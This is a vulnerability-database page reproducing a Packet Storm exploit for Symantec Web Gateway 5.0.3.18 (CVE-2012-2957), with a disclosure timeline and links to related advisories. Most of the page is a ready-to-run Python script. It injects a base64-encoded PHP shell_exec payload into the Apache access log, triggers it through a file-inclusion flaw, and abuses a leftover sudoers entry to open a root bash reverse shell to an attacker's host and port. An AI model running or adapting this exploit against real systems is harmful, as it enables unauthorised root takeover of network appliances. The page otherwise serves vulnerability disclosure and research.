Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMutsPACKETSTORM:114975
HistoryJul 24, 2012 - 12:00 a.m.

Symantec Web Gateway 5.0.3.18 LFI / Command Execution

2012-07-2400:00:00
muts
packetstormsecurity.com
26

0.955 High

EPSS

Percentile

99.4%

JSON
`#!/usr/bin/python  
  
'''  
  
The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the  
/tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply  
recreate the file and obtain a root shell using a different LFI vulnerability.  
  
Timeline:  
  
# 06 Jun 2012: Vulnerability reported to CERT  
# 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012  
# 26 Jun 2012: Email received from Symantec for additional information  
# 26 Jun 2012: Additional proofs of concept sent to Symantec  
# 06 Jul 2012: Update received from Symantec with intent to fix  
# 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00  
# 23 Jul 2012: Public Disclosure  
  
'''  
  
import socket  
import sys  
import base64  
  
print "[*] #########################################################"  
print "[*] Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit"  
print "[*] Offensive Security - http://www.offensive-security.com"  
print "[*] #########################################################\n"  
  
if (len(sys.argv) != 4):  
print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>"  
exit(0)  
  
rhost = str(sys.argv[1])  
lhost = sys.argv[2]  
lport = sys.argv[3]  
  
# Base64 encoded bash reverse shell  
# Payload does sudo-fu abuse of sudoable /tmp/networkScript with apache:apache permissions  
  
payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/'''+lhost+'/' + lport  
payload+=''' 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''  
payloadencoded=base64.encodestring(payload).replace("\n","")  
  
taint="GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\r\n\r\n" % payloadencoded  
trigger="GET /spywall/languageTest.php?&language=../../../../../../../../usr/local/apache2/logs/access_log%00 HTTP/1.0\r\n\r\n"  
  
print "[*] Super Sudo Backdoor injection, w00t"  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
expl.connect((rhost, 80))  
expl.send(taint)  
expl.close()  
  
print "[*] Triggering Payload ...3,2,1 "  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
expl.connect((rhost, 80))  
expl.send(trigger)  
expl.close()  
print "[*] Can you haz shell on %s %s ?\n" % (lhost,lport)  
  
`

Related

openvas 2
cve 1
prion 1
cvelist 1
checkpoint_advisories 1
nvd 1
nessus 1
dsquare 1
cert 1
symantec 1
openvas
openvas
Symantec Web Gateway Local File Manipulation Authentication Bypass Vulnerability
2012-07-24 00:00:00
Symantec Web Gateway Multiple Vulnerabilities
2012-07-24 00:00:00
cve
cve
CVE-2012-2957
2012-07-23 17:55:03
prion
prion
Design/Logic Flaw
2012-07-23 17:55:00
cvelist
cvelist
CVE-2012-2957
2012-07-23 17:00:00
checkpoint_advisories
checkpoint_advisories
Symantec Web Gateway Local File Inclusion (CVE-2012-2957)
2021-09-29 00:00:00
nvd
nvd
CVE-2012-2957
2012-07-23 17:55:03
nessus
nessus
Symantec Web Gateway Multiple Script Shell Command Execution (SYM12-011)
2012-08-06 00:00:00
dsquare
dsquare
Symantec Web Gateway 5.0.3 RCE
2013-02-08 00:00:00
cert
cert
Symantec Web Gateway contains multiple vulnerabilities
2012-07-24 00:00:00
symantec
symantec
Symantec Web Gateway Security Issues
2012-07-20 08:00:00

0.955 High

EPSS

Percentile

99.4%

JSON
Related for PACKETSTORM:114975
openvas2cve1prion1cvelist1checkpoint_advisories1nvd1nessus1dsquare1cert1symantec1